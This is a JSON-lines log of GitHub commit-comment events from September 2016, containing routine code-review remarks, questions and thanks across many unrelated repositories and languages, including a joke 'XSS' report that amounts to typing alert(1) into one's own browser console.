{"id":"4636342220","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19221631,"position":13,"line":13,"path":"lib/Adminer.php","commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-29T10:22:51Z","updated_at":"2016-09-29T10:22:51Z","body":"Ich will den Adminer direkt über das AddOn aufrufen lassen. Ansonsten müsste man sich erst selbst die adminer.php Datei holen und einloggen. So kann man direkt vom Backend auf die Datenbank zugreifen."}},"created_at":"2016-09-29T10:22:51Z"}
{"id":"4636348881","type":"CommitCommentEvent","actor":{"login":"hannesm"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19221644,"position":561,"line":747,"path":"lib/imap.ml","commit_id":"34ae26d7f03cbaca516491bbcfe729bdb73fce0b","created_at":"2016-09-29T10:24:19Z","updated_at":"2016-09-29T10:24:19Z","body":"@nojb I don't understand.. shouldn't an IMAP parser be able to parse a stream?  or do you have the magic somewhere which ensures that requests/replies are complete before passed to the parser?"}},"created_at":"2016-09-29T10:24:19Z"}
{"id":"4636351780","type":"CommitCommentEvent","actor":{"login":"fancyecommerce"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19221651,"position":null,"line":null,"path":null,"commit_id":"5bf5223e2e50bc002a40ea37700b53a0ae4cac79","created_at":"2016-09-29T10:24:55Z","updated_at":"2016-09-29T10:24:55Z","body":"good！"}},"created_at":"2016-09-29T10:24:55Z"}
{"id":"4636354594","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19221657,"position":11,"line":8,"path":"src/com/DimezisCheck/MostSimplePolindrome.java","commit_id":"9c7b3bb4f81fd0f6355ef7664540beb9c7343139","created_at":"2016-09-29T10:25:29Z","updated_at":"2016-09-29T10:25:29Z","body":"Can be StringBuilder"}},"created_at":"2016-09-29T10:25:29Z"}
{"id":"4636355322","type":"CommitCommentEvent","actor":{"login":"manuelroth"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19221658,"position":null,"line":null,"path":null,"commit_id":"9e7bcfab33b1e85c4a7f50f02d98c41bd3bb9618","created_at":"2016-09-29T10:25:38Z","updated_at":"2016-09-29T10:25:38Z","body":"@brandyscarney what does \"and their corresponding `import` statements\" mean?- Could you provide an example for this.\r\n\r\nDoes this mean if I included all my providers in the `src/app/app.module.ts` file, I don't have to import the service anymore in the component?- In your example [conference-app](https://github.com/driftyco/ionic-conference-app/blob/master/src/pages/schedule/schedule.ts#L8) services are still imported like this `import { UserData } from '../../providers/user-data';`\r\n\r\n"}},"created_at":"2016-09-29T10:25:38Z"}
{"id":"4636355799","type":"CommitCommentEvent","actor":{"login":"hannesm"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19221662,"position":null,"line":null,"path":null,"commit_id":"19c61a80ecff0cf885873e2c2edaa9e3fc5a5811","created_at":"2016-09-29T10:25:45Z","updated_at":"2016-09-29T10:25:45Z","body":"just to let you know, there is a complete mime parser written in OCaml https://github.com/oklm-wsh/MrMime/ which you might want to reuse instead of reimplement :)"}},"created_at":"2016-09-29T10:25:45Z"}
{"id":"4636358542","type":"CommitCommentEvent","actor":{"login":"chochreiner"},"repo":{"name":"chochreiner/jabref"},"payload":{"comment":{"id":19221668,"position":null,"line":null,"path":null,"commit_id":"b7e6000f9dc73a8ceb2c94cffc3dbb6c96100e1b","created_at":"2016-09-29T10:26:19Z","updated_at":"2016-09-29T10:26:19Z","body":"can you please check, whether this change has any effects for other operating systems - i only checked in on MacOS"}},"created_at":"2016-09-29T10:26:19Z"}
{"id":"4636361629","type":"CommitCommentEvent","actor":{"login":"stoneyang"},"repo":{"name":"stoneyang/caffe"},"payload":{"comment":{"id":19221678,"position":null,"line":null,"path":null,"commit_id":"b95c57df6d9469c88c011953bda561ada2307654","created_at":"2016-09-29T10:26:58Z","updated_at":"2016-09-29T10:26:58Z","body":"These layers are originally from [here](https://github.com/freesouls/caffe)"}},"created_at":"2016-09-29T10:26:58Z"}
{"id":"4636361754","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221679,"position":null,"line":null,"path":null,"commit_id":"11b1272fea8a974e12852b623d3f3e5afb55c38a","created_at":"2016-09-29T10:27:00Z","updated_at":"2016-09-29T10:27:00Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=24)"}},"created_at":"2016-09-29T10:27:00Z"}
{"id":"4636364319","type":"CommitCommentEvent","actor":{"login":"manics"},"repo":{"name":"joshmoore/infrastructure"},"payload":{"comment":{"id":19221682,"position":10,"line":52,"path":"ansible/Vagrantfile","commit_id":"0d26e4b875935823213582f610c19d1c4b8865e8","created_at":"2016-09-29T10:27:34Z","updated_at":"2016-09-29T10:27:34Z","body":"This isn't going to do anything since `group_vars` are relative to the playbook, and the only relevant file is in `idr-playbooks/group_vars`"}},"created_at":"2016-09-29T10:27:34Z"}
{"id":"4636364591","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19221683,"position":13,"line":13,"path":"lib/Adminer.php","commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-29T10:27:38Z","updated_at":"2016-09-29T10:27:38Z","body":"überlesen\r\n\r\n> es gibt ja nen adminer addon\r\n\r\nnicht für REDAXO 4. Das ADdon hier ist ein REDAXO 4 Addon welches die Daten für REDAXO 5 aufarbeitet."}},"created_at":"2016-09-29T10:27:38Z"}
{"id":"4636369982","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19221689,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T10:28:49Z","updated_at":"2016-09-29T10:28:49Z","body":"Но, можно использовать и для экономии памяти. Например, в случае со строками."}},"created_at":"2016-09-29T10:28:49Z"}
{"id":"4636370232","type":"CommitCommentEvent","actor":{"login":"KristijanArmeni"},"repo":{"name":"KristijanArmeni/fieldtrip"},"payload":{"comment":{"id":19221690,"position":null,"line":null,"path":null,"commit_id":"ebc90a91d50c0070f496da2ad0046c88ae417363","created_at":"2016-09-29T10:28:51Z","updated_at":"2016-09-29T10:28:51Z","body":"Would it make sense to also allow for 'cfg.mi.opts' field in ft_connectivityanalysis (874) to create the opts structure in ft_connectivity_mutualinformation when using the ibtb algorithm? Currently, ft_connectivity_mutualinformation expects this to be specified in 'opts' input arg (86-89):\r\n\r\n    opts        = ft_getopt(varargin, 'opts', []);\r\n    opts.nt     = ft_getopt(opts, 'nt', []);\r\n    opts.method = ft_getopt(opts, 'method', 'dr');\r\n    opts.bias   = ft_getopt(opts, 'bias',   'pt');\r\n\r\n and then passes 'opts' struct to information.m (135).\r\n\r\n    output(k,p,m) = information(R2, opts, 'I'); % this computes mutual information\r\n\r\nUnless it is set in cfg.mi somehow within ft_connectivityanalysis.m, it will always set to default options I think."}},"created_at":"2016-09-29T10:28:51Z"}
{"id":"4636371035","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"aurusov/raox"},"payload":{"comment":{"id":19221693,"position":102,"line":92,"path":"docs/reference/search.html","commit_id":"3619823f583763b0ba56225edd093ded3431b097","created_at":"2016-09-29T10:29:02Z","updated_at":"2016-09-29T10:29:02Z","body":"Наверное, надо поправить такие штуки в `html` на коды."}},"created_at":"2016-09-29T10:29:02Z"}
{"id":"4636372458","type":"CommitCommentEvent","actor":{"login":"ashrafsarhan"},"repo":{"name":"ashrafsarhan/adv-r"},"payload":{"comment":{"id":19221697,"position":7,"line":22,"path":"spotifyr/R/auth.R","commit_id":"a3b890871ee30ec27081a30e9fb790008f50508d","created_at":"2016-09-29T10:29:21Z","updated_at":"2016-09-29T10:29:21Z","body":"@Mattias99 Please, uncomment this line as it's necessary as a logging information for the client!"}},"created_at":"2016-09-29T10:29:21Z"}
{"id":"4636374541","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"arquillian/arquillian-cube"},"payload":{"comment":{"id":19221701,"position":null,"line":null,"path":null,"commit_id":"e1c3b60bdfed9ea32d56e4abec6d2141b06980af","created_at":"2016-09-29T10:29:50Z","updated_at":"2016-09-29T10:29:50Z","body":"Done, thanks for the feedback."}},"created_at":"2016-09-29T10:29:50Z"}
{"id":"4636374553","type":"CommitCommentEvent","actor":{"login":"osamamaqbool"},"repo":{"name":"osamamaqbool/testMavericksSolution"},"payload":{"comment":{"id":19221702,"position":null,"line":null,"path":null,"commit_id":"7b1375eda74bd72019355cbb477871b918b12982","created_at":"2016-09-29T10:29:50Z","updated_at":"2016-09-29T10:29:50Z","body":"1. What is the major difference between an abstract class and an interface ?   Abstract class\t\t\t\t\t\t\t  1) Abstract class can have abstract and non-abstract methods.\t 2) Abstract class doesn't support multiple inheritance.\t 3) Abstract class can have final, non-final, static and non-static variables.\t 4) Abstract class can have static methods, main method and constructor. 5) Abstract class can provide the implementation of interface.\t 6) The abstract keyword is used to declare abstract class.\t 7) Example: \tpublic abstract class Shape{ \tpublic abstract void draw(); \t}\t   Interface 1) The interface keyword is used to declare interface. 2) Interface can't provide the implementation of abstract class. 3) Interface can't have static methods, main method or constructor. 4) Interface has only static and final variables. 5) Interface supports multiple inheritance. 6) Interface can have only abstract methods. 7) Example: \tpublic interface Drawable{ \tvoid draw(); \t}    2. Why is Java 7’s class inheritance flawed?   Ans2)  to avoid the diamond problem .Suppose we have two classes B and C inheriting from A. Assume that B and C are overriding an inherited method and they provide their own implementation. Now D inherits from both B and C doing multiple inheritance. D should inherit that overridden method, which overridden method will be used? Will it be from B or C? Here we have an ambiguity.   3. What are the major differences between Activities and Fragments ?   Ans3)  Activity has single view and fragment supports multiple views .   4. When using Fragments , how do you communicate back to their hosting Activity ?  Ans4)  we can then use getBaseActivity() as our root context.  5. Can you make an entire app without ever using Fragments ? Why or why not?Are there any special cases when you absolutely have to use or should use Fragments?  Ans 5)  Yes ,I have to make an app that is only run on android devices not tablet fragements have een introduced in 3.0 for tablets only but after wards android sdk provide complete lifecycle for device and tablet as well .There is a case when we are working on scnarios where mater ,detail functionality is required then in that case fragments were very usefull.   6. What makes an AsyncTask such an annoyance to Android developers? Detail some of the issues with AsyncTask , and how to potentially solve them   Ans6)    Android Async task is become tricky when we have to perform web synchronization and update our UI acordingly but async task will not breake in middle of operation now adays retrofit and volley is very usefull libraries to avoid async ambiguities"}},"created_at":"2016-09-29T10:29:50Z"}
{"id":"4636376958","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19221703,"position":null,"line":null,"path":null,"commit_id":"a414d20846c465c55f67a7e87cbe27f5b32fb73f","created_at":"2016-09-29T10:30:19Z","updated_at":"2016-09-29T10:30:19Z","body":"Oh, no… now I see what the last `else`  clause does. That's an even better solution."}},"created_at":"2016-09-29T10:30:19Z"}
{"id":"4636378179","type":"CommitCommentEvent","actor":{"login":"nojb"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19221705,"position":561,"line":747,"path":"lib/imap.ml","commit_id":"34ae26d7f03cbaca516491bbcfe729bdb73fce0b","created_at":"2016-09-29T10:30:34Z","updated_at":"2016-09-29T10:30:34Z","body":"Well it all depends where do you draw the line.  IMAP messages are logically a sequence of \"lines\".  These \"lines\" can be parsed completely on their own. When I say that I do not need streaming, it is because I ensure to read a whole \"line\" before starting to parse.  Of course I do streming, but on the level of \"lines\" instead of smaller chunks of bytes.  In practice this seems to work well and is much simpler and more efficient than trying to do something at a finer level.\r\n\r\nOf course, when retrieving messages (which are sent as \"lines\") this means that need to keep the whole message in memory while parsing.  But IMAP has many ways to avoid having to download the whole message to begin with (one can select attachments, textual content, etc, etc and just donwload that)."}},"created_at":"2016-09-29T10:30:34Z"}
{"id":"4636380248","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221709,"position":null,"line":null,"path":null,"commit_id":"fad00b6f15ae7d22edf81590fa11b186fb1a4192","created_at":"2016-09-29T10:31:01Z","updated_at":"2016-09-29T10:31:01Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=26)"}},"created_at":"2016-09-29T10:31:01Z"}
{"id":"4636380908","type":"CommitCommentEvent","actor":{"login":"v-cchen"},"repo":{"name":"wacn/techcontent"},"payload":{"comment":{"id":19221711,"position":null,"line":null,"path":null,"commit_id":"73cc1df4944e082e3bd8e7e8d58c322377e1325e","created_at":"2016-09-29T10:31:10Z","updated_at":"2016-09-29T10:31:10Z","body":"Disagree:\r\nLine: 21,25,29,37,41,45,53,57 because url should be cn instead of com.\r\n\r\nTFS work request 68894"}},"created_at":"2016-09-29T10:31:10Z"}
{"id":"4636381876","type":"CommitCommentEvent","actor":{"login":"lamby"},"repo":{"name":"tomokas/dots"},"payload":{"comment":{"id":19221713,"position":null,"line":null,"path":null,"commit_id":"1ae39a0ad58a452b87191adc9edc7ac9de471989","created_at":"2016-09-29T10:31:22Z","updated_at":"2016-09-29T10:31:22Z","body":"np... :)"}},"created_at":"2016-09-29T10:31:22Z"}
{"id":"4636383575","type":"CommitCommentEvent","actor":{"login":"masone"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19221719,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-29T10:31:44Z","updated_at":"2016-09-29T10:31:44Z","body":"it's just a dynamic database name that happens to be a host. it has nothing to with network / resolving hosts :)"}},"created_at":"2016-09-29T10:31:44Z"}
{"id":"4636385775","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19221722,"position":null,"line":null,"path":null,"commit_id":"a414d20846c465c55f67a7e87cbe27f5b32fb73f","created_at":"2016-09-29T10:32:13Z","updated_at":"2016-09-29T10:32:13Z","body":"Hmm, well… actually, isn't it still a reasonable thing to perss ScrollLock twice in normal operation? So maybe an additional guard with a timer would still make sens."}},"created_at":"2016-09-29T10:32:13Z"}
{"id":"4636387517","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19221726,"position":null,"line":null,"path":null,"commit_id":"b36348e436dfc0fc128b3617b921b3bc5cbe03d6","created_at":"2016-09-29T10:32:38Z","updated_at":"2016-09-29T10:32:38Z","body":"Perhaps you are already aware of very similar tests by @Rocky640. But adding them here for a reference:\r\nhttp://tests.stockfishchess.org/tests/view/56356b2e0ebc59227df16d1e\r\nhttp://tests.stockfishchess.org/tests/view/56381d0c0ebc59227df16e2b\r\n\r\nBut its good to see your test doing well so far. Good luck!"}},"created_at":"2016-09-29T10:32:38Z"}
{"id":"4636387921","type":"CommitCommentEvent","actor":{"login":"govolution"},"repo":{"name":"govolution/betterdefaultpasslist"},"payload":{"comment":{"id":19221727,"position":null,"line":null,"path":null,"commit_id":"7c20c24e997ba64b1772ae5543dfd1c0d484c1cf","created_at":"2016-09-29T10:32:43Z","updated_at":"2016-09-29T10:32:43Z","body":"Go XSS yourself."}},"created_at":"2016-09-29T10:32:43Z"}
{"id":"4636388390","type":"CommitCommentEvent","actor":{"login":"gsaponaro"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":19221728,"position":null,"line":null,"path":null,"commit_id":"7553c9c865ee6d7136de5c349e664049418cd00c","created_at":"2016-09-29T10:32:49Z","updated_at":"2016-09-29T10:32:49Z","body":"Hi @barbalberto, just noticed a small typo here: sneding -> sending."}},"created_at":"2016-09-29T10:32:49Z"}
{"id":"4636389936","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19221731,"position":null,"line":null,"path":null,"commit_id":"fcad29200a5e061f6037c770be2b610db047698c","created_at":"2016-09-29T10:33:11Z","updated_at":"2016-09-29T10:33:11Z","body":"I don't understand your question. I didn't use the ELO of Sungorus anywhere. I am measuring the ELO **difference** between Demolito and Sungorus 1.4."}},"created_at":"2016-09-29T10:33:11Z"}
{"id":"4636390273","type":"CommitCommentEvent","actor":{"login":"RogueM"},"repo":{"name":"Gadgetoid/Pinout2"},"payload":{"comment":{"id":19221733,"position":null,"line":null,"path":null,"commit_id":"ddee2f7056d3788fd0ffbc034d34fcdf89e504be","created_at":"2016-09-29T10:33:15Z","updated_at":"2016-09-29T10:33:15Z","body":"@Gadgetoid your AI file is the uncorrected version... I don't have the same version of AI so did not want to overwrite yours. I have added an EPS though, a bit more in the spirit of 'open' ;-)\r\n(tried to make svg but it turned out missing some bits, but ideally that is the format that would be the most 'open'?)"}},"created_at":"2016-09-29T10:33:15Z"}
{"id":"4636391920","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"usmetanina/sharp-skb"},"payload":{"comment":{"id":19221735,"position":67,"line":73,"path":"WorkWithTriangle/WorkWithTriangle/Triangle.cs","commit_id":"f1b031183230cb4dc80a393816a1f41b9afe48f4","created_at":"2016-09-29T10:33:37Z","updated_at":"2016-09-29T10:33:37Z","body":"Это проверка у вас есть везде перед вызовом этого метода, и внутри этого метода есть тоже"}},"created_at":"2016-09-29T10:33:37Z"}
{"id":"4636392057","type":"CommitCommentEvent","actor":{"login":"RogueM"},"repo":{"name":"Gadgetoid/Pinout2"},"payload":{"comment":{"id":19221736,"position":null,"line":null,"path":null,"commit_id":"ddee2f7056d3788fd0ffbc034d34fcdf89e504be","created_at":"2016-09-29T10:33:39Z","updated_at":"2016-09-29T10:33:39Z","body":"this is in relation to #115 btw."}},"created_at":"2016-09-29T10:33:39Z"}
{"id":"4636392474","type":"CommitCommentEvent","actor":{"login":"nojb"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19221738,"position":null,"line":null,"path":null,"commit_id":"19c61a80ecff0cf885873e2c2edaa9e3fc5a5811","created_at":"2016-09-29T10:33:44Z","updated_at":"2016-09-29T10:33:44Z","body":"Thanks for the comment!  But actually I am not parsing the MIME format.  IMAP *servers* need to be able to parse MIME and they can send a textual description of each message structure to their clients to allow them to fetch only some parts of them.  The parsing code that you are referring to parses precisely this textual description."}},"created_at":"2016-09-29T10:33:44Z"}
{"id":"4636393144","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19221741,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-29T10:33:53Z","updated_at":"2016-09-29T10:33:53Z","body":"implemented in #3540"}},"created_at":"2016-09-29T10:33:53Z"}
{"id":"4636394403","type":"CommitCommentEvent","actor":{"login":"liujian001"},"repo":{"name":"cnso/BluetoothDemo"},"payload":{"comment":{"id":19221744,"position":null,"line":null,"path":null,"commit_id":"12f1f13a8972e00e9d6fcf0bfc035fa44940d00e","created_at":"2016-09-29T10:34:10Z","updated_at":"2016-09-29T10:34:10Z","body":"我在两部手机上安装该程序，运行后，提示此设备不支持聊天，楼主是怎么运行起来并聊天？？"}},"created_at":"2016-09-29T10:34:10Z"}
{"id":"4636398777","type":"CommitCommentEvent","actor":{"login":"ashrafsarhan"},"repo":{"name":"ashrafsarhan/adv-r"},"payload":{"comment":{"id":19221751,"position":9,"line":24,"path":"spotifyr/R/auth.R","commit_id":"a3b890871ee30ec27081a30e9fb790008f50508d","created_at":"2016-09-29T10:35:09Z","updated_at":"2016-09-29T10:35:09Z","body":"@Mattias99 You shouldn't check the response status here, the function must return the response whatever its status."}},"created_at":"2016-09-29T10:35:09Z"}
{"id":"4636399569","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19221753,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T10:35:19Z","updated_at":"2016-09-29T10:35:19Z","body":"Looking at the examples within the readme on the front page it's definitely reading much clearer now.  I think it's time to get the JSON serialisation working!\r\n\r\nWhich raises an ugly issue, all of the Tn types need to be serializable.   And we need to store the value's type along with the value so we know how to deserialize it.  Heh, or an index.  (!)"}},"created_at":"2016-09-29T10:35:19Z"}
{"id":"4636402031","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"usmetanina/sharp-skb"},"payload":{"comment":{"id":19221759,"position":67,"line":73,"path":"WorkWithTriangle/WorkWithTriangle/Triangle.cs","commit_id":"f1b031183230cb4dc80a393816a1f41b9afe48f4","created_at":"2016-09-29T10:35:54Z","updated_at":"2016-09-29T10:35:54Z","body":"Эта проверка вызывается перед вызовом этого метода, и внутри вызывается ещё раз"}},"created_at":"2016-09-29T10:35:54Z"}
{"id":"4636403785","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19221764,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-29T10:36:18Z","updated_at":"2016-09-29T10:36:18Z","body":"I added another paragraph to \"Unresolved questions\".\r\n\r\nContinual morphing seems tricky: Every change to the tree changes the root hash (that's the whole point of a Merkle tree), so every node would need to compute and store every new root hash that is caused by any change anywhere else in the network.\r\n\r\nI think all that data chains can do for us there is lowering the requirement for the tree computation frequency: The tree itself is immutable, with all its leaves, but if the leaves are link blocks, an old tree is still useful, since the data chains can connect it to the current link blocks."}},"created_at":"2016-09-29T10:36:18Z"}
{"id":"4636404275","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19221765,"position":50,"line":50,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-29T10:36:24Z","updated_at":"2016-09-29T10:36:24Z","body":"Trusting the genesis group forever would mean that the owners of the genesis group's keys always have the power to forge node identities. In some form, we need to frequently expand the web of trust in the horizontal direction, too, to prevent that. (But that may well be an additional block type in the data chain, of course. We'd just need to come up with a way how a node can produce a proof of identity for any other node elsewhere in the network then.)"}},"created_at":"2016-09-29T10:36:24Z"}
{"id":"4636404952","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"usmetanina/sharp-skb"},"payload":{"comment":{"id":19221768,"position":34,"line":41,"path":"WorkWithTriangle/WorkWithTriangle/Triangle.cs","commit_id":"f1b031183230cb4dc80a393816a1f41b9afe48f4","created_at":"2016-09-29T10:36:34Z","updated_at":"2016-09-29T10:36:34Z","body":"дублирование этих 4 строк какое-то очень очевидное и частое"}},"created_at":"2016-09-29T10:36:34Z"}
{"id":"4636405213","type":"CommitCommentEvent","actor":{"login":"Ashokmani2696"},"repo":{"name":"Ashokmani2696/sample"},"payload":{"comment":{"id":19221770,"position":null,"line":null,"path":null,"commit_id":"b34ca11906c6a0a46a21fb576db4b5e906423aa8","created_at":"2016-09-29T10:36:37Z","updated_at":"2016-09-29T10:36:37Z","body":"$ git add README.md"}},"created_at":"2016-09-29T10:36:37Z"}
{"id":"4636405637","type":"CommitCommentEvent","actor":{"login":"SanderElsen"},"repo":{"name":"pxlit-projects/classroom-exercise-2-SanderElsen"},"payload":{"comment":{"id":19221771,"position":null,"line":null,"path":null,"commit_id":"0df2c31361f5b9a725169dce40962b08a30cd633","created_at":"2016-09-29T10:36:43Z","updated_at":"2016-09-29T10:36:43Z","body":"Ik heb dat hier gevonden: \r\nhttp://docs.spring.io/spring/docs/current/spring-framework-reference/html/mvc.html#mvc-ann-return-types\r\nDit leek mij de makkelijkste manier maar ik weet niet zeker of het ook de beste is."}},"created_at":"2016-09-29T10:36:43Z"}
{"id":"4636407138","type":"CommitCommentEvent","actor":{"login":"LuizAndrade"},"repo":{"name":"LuizAndrade/EDL"},"payload":{"comment":{"id":19221775,"position":null,"line":null,"path":null,"commit_id":"daace1fd16ad16239875d9bc8aaa1b36b417a53a","created_at":"2016-09-29T10:37:04Z","updated_at":"2016-09-29T10:37:04Z","body":"Professor, o senhor prefere somente melhorar os nomes dos exemplos já existentes, ou escolher novos exemplos?"}},"created_at":"2016-09-29T10:37:04Z"}
{"id":"4636411386","type":"CommitCommentEvent","actor":{"login":"Ashokmani2696"},"repo":{"name":"Ashokmani2696/sample"},"payload":{"comment":{"id":19221787,"position":1,"line":1,"path":"README.md","commit_id":"b34ca11906c6a0a46a21fb576db4b5e906423aa8","created_at":"2016-09-29T10:38:01Z","updated_at":"2016-09-29T10:38:01Z","body":"$ git commit -m \"file updated\"\r\n\r\n$ git remote add https://github.com/Aishvaryavit/casetoollab.git\r\n\r\n$ git remote add origin https://github.com/Aishvaryavit/casetoollab.git\r\n"}},"created_at":"2016-09-29T10:38:01Z"}
{"id":"4636411567","type":"CommitCommentEvent","actor":{"login":"jmgnve"},"repo":{"name":"jmgnve/hbv_toy"},"payload":{"comment":{"id":19221788,"position":11,"line":11,"path":"README.md","commit_id":"f954760cb9901831eadf5c0431aa61f721c1a4b0","created_at":"2016-09-29T10:38:03Z","updated_at":"2016-09-29T10:38:03Z","body":"I think we should aim for many steps instead"}},"created_at":"2016-09-29T10:38:03Z"}
{"id":"4636418040","type":"CommitCommentEvent","actor":{"login":"kasramp"},"repo":{"name":"kasramp/UbuntuIndicatorWeather"},"payload":{"comment":{"id":19221803,"position":null,"line":null,"path":null,"commit_id":"70bcd98c77a3b09afb0c7c1d2c5946a4968eb99f","created_at":"2016-09-29T10:39:30Z","updated_at":"2016-09-29T10:39:30Z","body":"@Kycko noted, thanks for the clarification. I was unsure about it, your explanation has made it clear to me."}},"created_at":"2016-09-29T10:39:30Z"}
{"id":"4636424655","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19221808,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T10:40:59Z","updated_at":"2016-09-29T10:40:59Z","body":"```\r\n54.239.31.69\taws.amazon.com\r\n54.239.30.25\tconsole.aws.amazon.com\r\n54.239.96.90\tap-northeast-1.console.aws.amazon.com\r\n54.240.226.81 \tap-southeast-1.console.aws.amazon.com\r\n54.240.193.125 \tap-southeast-2.console.aws.amazon.com\r\n54.239.38.102\teu-west-1.console.aws.amazon.com\r\n54.239.54.102\teu-central-1.console.aws.amazon.com\r\n54.231.49.3\ts3.amazonaws.com\r\n54.239.31.128\ts3-console-us-standard.console.aws.amazon.com\r\n52.219.0.4\ts3-ap-northeast-1.amazonaws.com\r\n54.231.242.170\ts3-ap-southeast-1.amazonaws.com\r\n54.231.251.21\ts3-ap-southeast-2.amazonaws.com\r\n52.218.16.140\ts3-eu-west-1.amazonaws.com\r\n54.231.193.37\ts3-eu-central-1.amazonaws.com\r\n52.92.72.2\ts3-sa-east-1.amazonaws.com\r\n54.231.236.6\ts3-us-west-1.amazonaws.com\r\n54.231.168.160\ts3-us-west-2.amazonaws.com\r\n177.72.244.194\tsa-east-1.console.aws.amazon.com\r\n176.32.114.59\tus-west-1.console.aws.amazon.com\r\n54.240.254.230\tus-west-2.console.aws.amazon.com\r\n52.216.80.48\tgithub-cloud.s3.amazonaws.com\r\n54.231.48.40\tgithub-com.s3.amazonaws.com\r\n```\r\n\r\n@andytimes @Too-Naive "}},"created_at":"2016-09-29T10:40:59Z"}
{"id":"4636429948","type":"CommitCommentEvent","actor":{"login":"levy9527"},"repo":{"name":"xiangming/landscape-plus"},"payload":{"comment":{"id":19221818,"position":null,"line":null,"path":null,"commit_id":"7d12b0710d7997eae1883909d68262d424cff0be","created_at":"2016-09-29T10:42:09Z","updated_at":"2016-09-29T10:42:09Z","body":"哈哈, 这个bug, 我也发现了. 但我参考别人的博客, 还是觉得归档不分页好, 我现在是全部显示的. \r\n不过你这个pr给了我一点信心, 我以为这个项目没人理了,  一直没提pr😁 "}},"created_at":"2016-09-29T10:42:09Z"}
{"id":"4636429972","type":"CommitCommentEvent","actor":{"login":"thomaspatzke"},"repo":{"name":"govolution/betterdefaultpasslist"},"payload":{"comment":{"id":19221819,"position":null,"line":null,"path":null,"commit_id":"7c20c24e997ba64b1772ae5543dfd1c0d484c1cf","created_at":"2016-09-29T10:42:10Z","updated_at":"2016-09-29T10:42:10Z","body":"Sir, i found a critical xss vuln in ur passlist. reproduction:\r\n\r\n1. open txt file in browser\r\n2. press ctrl+shift+i\r\n3. enter \"alert(1)\" and press enter\r\n4. pwn!\r\n\r\nplz bounty!"}},"created_at":"2016-09-29T10:42:10Z"}
{"id":"4636432445","type":"CommitCommentEvent","actor":{"login":"staltz"},"repo":{"name":"cyclejs/cyclejs"},"payload":{"comment":{"id":19221825,"position":6,"line":55,"path":"dom/src/makeDOMDriver.ts","commit_id":"c91e7c619feb187f9aed5665d291babdd896d078","created_at":"2016-09-29T10:42:43Z","updated_at":"2016-09-29T10:42:43Z","body":"Question @Frikki, why the `xs.merge`? Then when dispose happens, rootElement will receive `''` from sanitation$. Is this desired?"}},"created_at":"2016-09-29T10:42:43Z"}
